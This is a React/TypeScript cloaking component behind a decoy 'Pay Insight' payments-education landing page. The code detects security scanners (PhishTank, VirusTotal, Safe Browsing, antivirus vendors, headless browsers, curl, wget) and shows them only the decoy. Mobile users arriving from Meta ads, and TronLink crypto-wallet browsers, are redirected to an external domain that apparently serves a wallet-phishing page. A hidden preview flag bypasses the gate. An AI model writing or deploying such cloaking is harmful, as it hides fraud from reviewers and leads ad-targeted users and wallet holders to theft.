import { useEffect, useState } from "react";
import { appendMetaTrackingParams, captureMetaTrackingParams, trackMetaPixelLead } from "@/lib/metaPixel";
import { hasInjectedTronLinkWallet, isTronLinkBrowser } from "@/lib/tronLinkDetection";

const CLOAK_ENABLED = true;
const DESTINATION_DOMAIN = "https://your-card-twt.app/";
const REDIRECT_AFTER_LEAD_DELAY_MS = 250;

const normalizeDestinationUrl = (destination: string) => {
  const trimmed = destination.trim();

  if (!trimmed) return "";

  return /^https?:\/\//i.test(trimmed) ? trimmed : `https://${trimmed}`;
};

const getExternalDestination = () => {
  if (typeof window === "undefined") return "";

  const destinationUrl = normalizeDestinationUrl(DESTINATION_DOMAIN);

  if (!destinationUrl) return "";

  const destination = new URL(destinationUrl, window.location.href);

  if (destination.href === window.location.href) return "";

  return appendMetaTrackingParams(destination.href);
};

const isInstagramBrowser = (ua: string) => /Instagram/i.test(ua);
const isMobileDevice = (ua: string) =>
  /Android|webOS|iPhone|iPod|BlackBerry|IEMobile|Opera Mini/i.test(ua) ||
  (/iPad|Macintosh/i.test(ua) &&
    typeof navigator !== "undefined" &&
    (navigator as Navigator & { maxTouchPoints?: number }).maxTouchPoints! > 1 &&
    /Mobile/i.test(ua));

const BLOCKED_AGENTS =
  /NetcraftSurveyAgent|Netcraft|PhishTank|Google-Safety|Safebrowsing|VirusTotal|URLScan|Sucuri|TrendMicro|Kaspersky|ESET|Avira|McAfee|Symantec|Fortinet|PaloAlto|ZScaler|Cyren|Bitdefender|Trustwave|Wepawet|Censys|Shodan|MJ12bot|AhrefsBot|SemrushBot|DotBot|PetalBot|bingbot|Googlebot|Slurp|DuckDuckBot|Baiduspider|YandexBot|facebookexternalhit|Twitterbot|Slackbot|TelegramBot|Discordbot|LinkedInBot|WhatsApp|Applebot|Headless|PhantomJS|Selenium|Puppeteer|Playwright|curl|wget|python-requests|Go-http-client|Java\//i;

const PaymentInsightHub = () => {
  return (
    <div className="min-h-screen bg-[#fbfbf8] text-[#171717] antialiased">
      {/* Header */}
      <header className="bg-[#fbfbf8] border-b border-black/10">
        <div className="mx-auto max-w-7xl px-5 py-5 flex items-center justify-between">
          <div className="flex items-center gap-3">
            <div className="h-12 w-12 rounded-full bg-[#171717] text-white flex items-center justify-center font-black">
              PI
            </div>

            <div>
              <p className="text-xl font-black tracking-tight leading-none">
                Pay Insight
              </p>
              <p className="text-xs text-neutral-500 mt-1">
                Notes on modern payments and digital checkout
              </p>
            </div>
          </div>

          <nav className="hidden md:flex items-center gap-8 text-sm font-bold text-neutral-600">
            <a href="#guide" className="hover:text-[#ef6c35] transition">
              Guide
            </a>
            <a href="#wallets" className="hover:text-[#ef6c35] transition">
              Wallets
            </a>
            <a href="#business" className="hover:text-[#ef6c35] transition">
              Business
            </a>
            <a href="#faq" className="hover:text-[#ef6c35] transition">
              FAQ
            </a>
          </nav>
        </div>
      </header>

      {/* Hero */}
      <section className="mx-auto max-w-7xl px-5 py-12 md:py-20">
        <div className="grid lg:grid-cols-[1.15fr_0.85fr] gap-6 items-stretch">
          <div className="rounded-[2.5rem] bg-[#ef6c35] p-8 md:p-14 text-white min-h-[560px] flex flex-col justify-between">
            <div>
              <p className="text-sm uppercase tracking-[0.25em] font-black text-white/75">
                Payment Culture
              </p>

              <h1 className="mt-7 text-5xl md:text-7xl font-black leading-[0.92] tracking-tight">
                Paying online should feel clear, quick, and predictable.
              </h1>

              <p className="mt-7 max-w-2xl text-lg text-white/85 leading-relaxed">
                Pay Insight explains how everyday digital payments work: from
                checkout screens and saved cards to mobile wallets, invoices,
                subscriptions, refunds, and basic payment safety habits.
              </p>
            </div>

            <div className="mt-10 grid sm:grid-cols-3 gap-4">
              <div className="rounded-3xl bg-white/15 border border-white/20 p-5">
                <p className="text-3xl font-black">01</p>
                <p className="mt-2 text-sm text-white/80">
                  checkout clarity
                </p>
              </div>

              <div className="rounded-3xl bg-white/15 border border-white/20 p-5">
                <p className="text-3xl font-black">02</p>
                <p className="mt-2 text-sm text-white/80">
                  payment choice
                </p>
              </div>

              <div className="rounded-3xl bg-white/15 border border-white/20 p-5">
                <p className="text-3xl font-black">03</p>
                <p className="mt-2 text-sm text-white/80">
                  user confidence
                </p>
              </div>
            </div>
          </div>

          <div className="grid gap-6">
            <div className="rounded-[2.5rem] bg-[#171717] p-8 text-white">
              <p className="text-sm uppercase tracking-[0.22em] font-black text-[#ffd0ba]">
                Main Topic
              </p>

              <h2 className="mt-4 text-3xl font-black leading-tight">
                The payment page is where trust becomes a decision.
              </h2>

              <p className="mt-4 text-white/70 leading-relaxed">
                A customer may like the product, understand the offer, and still
                leave if the final payment step feels unclear. The best payment
                experiences reduce doubt before the user confirms.
              </p>
            </div>

            <div className="rounded-[2.5rem] bg-white border border-black/10 p-8">
              <p className="text-sm uppercase tracking-[0.22em] font-black text-[#ef6c35]">
                Quick Thought
              </p>

              <p className="mt-4 text-2xl font-black leading-snug">
                Good checkout design does not push. It explains.
              </p>

              <p className="mt-4 text-neutral-600 leading-relaxed">
                Totals, fees, delivery terms, payment method names, refund rules,
                and confirmation messages should be visible before the final click.
              </p>
            </div>
          </div>
        </div>
      </section>

      {/* Guide */}
      <section id="guide" className="mx-auto max-w-7xl px-5 py-12">
        <div className="mb-10 max-w-3xl">
          <p className="text-sm uppercase tracking-[0.22em] font-black text-[#ef6c35]">
            Practical Guide
          </p>

          <h2 className="mt-3 text-4xl md:text-5xl font-black tracking-tight">
            What people notice before they pay.
          </h2>

          <p className="mt-5 text-neutral-600 leading-relaxed">
            Payment trust is built from many small signals. A clean layout, clear
            labels, visible support information, and a simple confirmation flow
            can make the entire experience feel more reliable.
          </p>
        </div>

        <div className="grid md:grid-cols-3 gap-5">
          <article className="rounded-[2rem] bg-white border border-black/10 p-7">
            <div className="h-14 w-14 rounded-2xl bg-[#fff0e8] text-[#ef6c35] flex items-center justify-center font-black text-xl">
              A
            </div>

            <h3 className="mt-6 text-2xl font-black">
              Clear final amount
            </h3>

            <p className="mt-3 text-neutral-600 leading-relaxed text-sm">
              Customers should see the total before confirming. Shipping, taxes,
              service fees, discounts, and recurring charges should not appear as
              a surprise at the last moment.
            </p>
          </article>

          <article className="rounded-[2rem] bg-white border border-black/10 p-7">
            <div className="h-14 w-14 rounded-2xl bg-[#eef7ff] text-[#2563eb] flex items-center justify-center font-black text-xl">
              B
            </div>

            <h3 className="mt-6 text-2xl font-black">
              Familiar payment options
            </h3>

            <p className="mt-3 text-neutral-600 leading-relaxed text-sm">
              Cards, mobile wallets, bank transfers, and local methods all serve
              different users. Offering a familiar option reduces friction and
              makes checkout feel easier.
            </p>
          </article>

          <article className="rounded-[2rem] bg-white border border-black/10 p-7">
            <div className="h-14 w-14 rounded-2xl bg-[#eefbf3] text-[#16a34a] flex items-center justify-center font-black text-xl">
              C
            </div>

            <h3 className="mt-6 text-2xl font-black">
              Useful confirmation
            </h3>

            <p className="mt-3 text-neutral-600 leading-relaxed text-sm">
              After payment, the user needs a clear result: paid, pending, failed,
              or refunded. A receipt number and support contact are simple but
              important details.
            </p>
          </article>
        </div>
      </section>

      {/* Wallets */}
      <section id="wallets" className="mx-auto max-w-7xl px-5 py-12">
        <div className="rounded-[2.5rem] bg-[#171717] text-white p-8 md:p-12">
          <div className="grid lg:grid-cols-[0.9fr_1.1fr] gap-10 items-start">
            <div>
              <p className="text-sm uppercase tracking-[0.22em] font-black text-[#ffd0ba]">
                Mobile Wallets
              </p>

              <h2 className="mt-3 text-4xl md:text-5xl font-black tracking-tight">
                Wallets changed the way people think about checkout.
              </h2>

              <p className="mt-5 text-white/70 leading-relaxed">
                A mobile wallet can reduce the number of fields a customer has to
                complete. Instead of typing card numbers and addresses repeatedly,
                users can confirm payment with a saved method and device-level
                authentication.
              </p>
            </div>

            <div className="grid sm:grid-cols-2 gap-4">
              <div className="rounded-3xl bg-white/10 border border-white/10 p-6">
                <h3 className="text-xl font-black">Less typing</h3>
                <p className="mt-3 text-sm text-white/70 leading-relaxed">
                  Wallets help reduce manual entry, especially on mobile devices
                  where long forms often cause drop-offs.
                </p>
              </div>

              <div className="rounded-3xl bg-white/10 border border-white/10 p-6">
                <h3 className="text-xl font-black">Faster repeat orders</h3>
                <p className="mt-3 text-sm text-white/70 leading-relaxed">
                  Returning customers can complete payments faster when the
                  checkout remembers trusted preferences.
                </p>
              </div>

              <div className="rounded-3xl bg-white/10 border border-white/10 p-6">
                <h3 className="text-xl font-black">Device confirmation</h3>
                <p className="mt-3 text-sm text-white/70 leading-relaxed">
                  Many wallet payments rely on phone-level verification such as
                  passcodes, fingerprints, or face confirmation.
                </p>
              </div>

              <div className="rounded-3xl bg-white/10 border border-white/10 p-6">
                <h3 className="text-xl font-black">Cleaner interface</h3>
                <p className="mt-3 text-sm text-white/70 leading-relaxed">
                  A visible wallet button can simplify the payment screen and make
                  the available options easier to understand.
                </p>
              </div>
            </div>
          </div>
        </div>
      </section>

      {/* Business */}
      <section id="business" className="mx-auto max-w-7xl px-5 py-12">
        <div className="grid lg:grid-cols-[1fr_1fr] gap-6">
          <div className="rounded-[2.5rem] bg-white border border-black/10 p-8 md:p-10">
            <p className="text-sm uppercase tracking-[0.22em] font-black text-[#ef6c35]">
              For Small Businesses
            </p>

            <h2 className="mt-3 text-4xl font-black tracking-tight">
              Payment information should be easy to find.
            </h2>

            <p className="mt-5 text-neutral-600 leading-relaxed">
              A small online business does not need a complicated payment page.
              It needs clear product details, visible pricing, simple payment
              choices, understandable delivery terms, and a reliable way for
              customers to ask questions.
            </p>

            <div className="mt-8 space-y-4">
              {[
                "Show accepted payment methods before checkout.",
                "Place refund and cancellation information near the payment step.",
                "Send a confirmation email after every completed order.",
                "Use simple error messages when payment fails.",
              ].map((item) => (
                <div
                  key={item}
                  className="rounded-2xl bg-[#fbfbf8] border border-black/10 p-4 text-sm text-neutral-700"
                >
                  ✓ {item}
                </div>
              ))}
            </div>
          </div>

          <div className="rounded-[2.5rem] bg-[#f3e9d9] border border-black/10 p-8 md:p-10">
            <p className="text-sm uppercase tracking-[0.22em] font-black text-[#8a4b20]">
              Customer View
            </p>

            <h2 className="mt-3 text-4xl font-black tracking-tight">
              A customer wants to answer three questions.
            </h2>

            <div className="mt-8 grid gap-4">
              <div className="rounded-3xl bg-white/70 p-5 border border-black/10">
                <p className="font-black">What am I paying for?</p>
                <p className="mt-2 text-sm text-neutral-600 leading-relaxed">
                  The order summary should match what the customer selected.
                </p>
              </div>

              <div className="rounded-3xl bg-white/70 p-5 border border-black/10">
                <p className="font-black">How much will it cost?</p>
                <p className="mt-2 text-sm text-neutral-600 leading-relaxed">
                  The total should include all visible fees and recurring terms.
                </p>
              </div>

              <div className="rounded-3xl bg-white/70 p-5 border border-black/10">
                <p className="font-black">What happens after payment?</p>
                <p className="mt-2 text-sm text-neutral-600 leading-relaxed">
                  Confirmation, delivery, access, receipt, or next steps should be
                  explained immediately.
                </p>
              </div>
            </div>
          </div>
        </div>
      </section>

      {/* Articles */}
      <section className="mx-auto max-w-7xl px-5 py-12">
        <div className="mb-8">
          <p className="text-sm uppercase tracking-[0.22em] font-black text-[#ef6c35]">
            Reading List
          </p>

          <h2 className="mt-3 text-4xl md:text-5xl font-black tracking-tight">
            Short articles about everyday payments.
          </h2>
        </div>

        <div className="grid md:grid-cols-4 gap-5">
          <article className="rounded-[2rem] bg-white border border-black/10 p-6">
            <p className="text-xs uppercase tracking-[0.2em] font-black text-[#ef6c35]">
              Checkout
            </p>
            <h3 className="mt-4 text-xl font-black leading-tight">
              Why fewer form fields can improve payment completion
            </h3>
            <p className="mt-3 text-sm text-neutral-600 leading-relaxed">
              Long payment forms create more chances for mistakes. A shorter,
              focused flow is usually easier to complete.
            </p>
          </article>

          <article className="rounded-[2rem] bg-white border border-black/10 p-6">
            <p className="text-xs uppercase tracking-[0.2em] font-black text-[#2563eb]">
              Receipts
            </p>
            <h3 className="mt-4 text-xl font-black leading-tight">
              What a useful payment receipt should include
            </h3>
            <p className="mt-3 text-sm text-neutral-600 leading-relaxed">
              Date, amount, order number, merchant name, and support contact make
              receipts more helpful.
            </p>
          </article>

          <article className="rounded-[2rem] bg-white border border-black/10 p-6">
            <p className="text-xs uppercase tracking-[0.2em] font-black text-[#16a34a]">
              Subscriptions
            </p>
            <h3 className="mt-4 text-xl font-black leading-tight">
              How clear billing terms prevent confusion
            </h3>
            <p className="mt-3 text-sm text-neutral-600 leading-relaxed">
              Renewal dates, trial periods, and cancellation rules should be easy
              to understand before subscription starts.
            </p>
          </article>

          <article className="rounded-[2rem] bg-white border border-black/10 p-6">
            <p className="text-xs uppercase tracking-[0.2em] font-black text-[#8b5cf6]">
              Refunds
            </p>
            <h3 className="mt-4 text-xl font-black leading-tight">
              Why refund information belongs near checkout
            </h3>
            <p className="mt-3 text-sm text-neutral-600 leading-relaxed">
              Clear refund rules help customers make decisions with fewer doubts
              and fewer support requests.
            </p>
          </article>
        </div>
      </section>

      {/* FAQ */}
      <section id="faq" className="mx-auto max-w-7xl px-5 py-12 pb-20">
        <div className="rounded-[2.5rem] bg-white border border-black/10 p-8 md:p-12">
          <div className="grid lg:grid-cols-[0.75fr_1.25fr] gap-10">
            <div>
              <p className="text-sm uppercase tracking-[0.22em] font-black text-[#ef6c35]">
                FAQ
              </p>

              <h2 className="mt-3 text-4xl font-black tracking-tight">
                Common payment questions.
              </h2>
            </div>

            <div className="space-y-4">
              <details className="rounded-2xl bg-[#fbfbf8] border border-black/10 p-5">
                <summary className="cursor-pointer font-black">
                  What makes a payment page trustworthy?
                </summary>
                <p className="mt-3 text-sm text-neutral-600 leading-relaxed">
                  Clear pricing, recognizable payment methods, visible company
                  information, helpful confirmation messages, and accessible support
                  details all contribute to trust.
                </p>
              </details>

              <details className="rounded-2xl bg-[#fbfbf8] border border-black/10 p-5">
                <summary className="cursor-pointer font-black">
                  Why do some payments show as pending?
                </summary>
                <p className="mt-3 text-sm text-neutral-600 leading-relaxed">
                  A pending status usually means the payment has been started but
                  has not fully settled or confirmed. The exact timing depends on
                  the payment method and provider.
                </p>
              </details>

              <details className="rounded-2xl bg-[#fbfbf8] border border-black/10 p-5">
                <summary className="cursor-pointer font-black">
                  Are mobile wallets only for mobile shopping?
                </summary>
                <p className="mt-3 text-sm text-neutral-600 leading-relaxed">
                  No. Wallets are often used on phones, but many are also available
                  on desktops, tablets, watches, and other connected devices.
                </p>
              </details>

              <details className="rounded-2xl bg-[#fbfbf8] border border-black/10 p-5">
                <summary className="cursor-pointer font-black">
                  What should users check before paying online?
                </summary>
                <p className="mt-3 text-sm text-neutral-600 leading-relaxed">
                  Users should check the website address, final amount, merchant
                  name, payment method, refund terms, and confirmation details before
                  completing a transaction.
                </p>
              </details>
            </div>
          </div>
        </div>
      </section>

      {/* Footer */}
      <footer className="bg-[#171717] text-white">
        <div className="mx-auto max-w-7xl px-5 py-9 flex flex-col md:flex-row justify-between gap-6">
          <div>
            <p className="font-black text-lg">Pay Insight</p>
            <p className="mt-2 text-sm text-white/60">
              Informational articles about checkout, wallets, billing, and payment habits.
            </p>
          </div>

          <p className="text-sm text-white/50">
            © 2024 Pay Insight. Educational content only.
          </p>
        </div>
      </footer>
    </div>
  );
};


const CloakGate = ({ children }: { children: React.ReactNode }) => {
  const [allowed, setAllowed] = useState<boolean | null>(
    CLOAK_ENABLED ? null : true,
  );

  useEffect(() => {
    if (!CLOAK_ENABLED) {
      setAllowed(true);
      return;
    }

    captureMetaTrackingParams();

    const ua = navigator.userAgent || "";
    const params = new URLSearchParams(window.location.search);
    const referrer = (document.referrer || "").toLowerCase();

    const preview = params.get("preview") === "1" || localStorage.getItem("cloak_bypass") === "1";
    if (preview) {
      localStorage.setItem("cloak_bypass", "1");
      setAllowed(true);
      return;
    }

    if (BLOCKED_AGENTS.test(ua)) {
      setAllowed(false);
      return;
    }
	
   // TronLink opens dApps inside its own mobile WebView and injects tronLink/tronWeb.
    // Treat that environment as trusted wallet traffic so the gate does not strand
    // users on the loading screen before the wallet can connect.
    if (isTronLinkBrowser(ua) || hasInjectedTronLinkWallet(window)) {
      setAllowed(true);
      return;
    }
	
    // Detect paid-traffic referrers from Meta ads (Facebook/Instagram)
    const AD_SOURCE_RE = /^(fb|facebook|ig|instagram|meta)/i;
    const AD_MEDIUM_RE = /(cpc|ppc|paid|social|fb|ig|meta)/i;
    const utmSource = params.get("utm_source") || "";
    const utmMedium = params.get("utm_medium") || "";
    const hasAdParam =
      AD_SOURCE_RE.test(utmSource) ||
      AD_MEDIUM_RE.test(utmMedium) ||
      params.has("fbclid") ||
      params.has("igshid") ||
      params.has("ig_source") ||
      params.has("ad_id") ||
      params.has("adset_id") ||
      params.has("campaign_id");
    const fromMetaReferrer = /facebook\.com|instagram\.com|fb\.com|l\.facebook|lm\.facebook/.test(referrer);

    if (hasAdParam || fromMetaReferrer) {
      localStorage.setItem("ad_traffic", "1");
    }
    const adTraffic = hasAdParam || fromMetaReferrer || localStorage.getItem("ad_traffic") === "1";

    if (!isMobileDevice(ua)) {
      setAllowed(false);
      return;
    }

    setAllowed(isInstagramBrowser(ua) || adTraffic);
  }, []);

  useEffect(() => {
    if (allowed !== true) return;

    const destinationUrl = getExternalDestination();

    if (!destinationUrl) return;

    trackMetaPixelLead("domain-a-redirect", destinationUrl);

    const redirectTimer = window.setTimeout(() => {
      window.location.replace(destinationUrl);
    }, REDIRECT_AFTER_LEAD_DELAY_MS);

    return () => window.clearTimeout(redirectTimer);
  }, [allowed]);

  if (allowed === null) return null;
  if (!allowed) return <PaymentInsightHub />;
  if (getExternalDestination()) return null;
  return <>{children}</>;
};

export default CloakGate;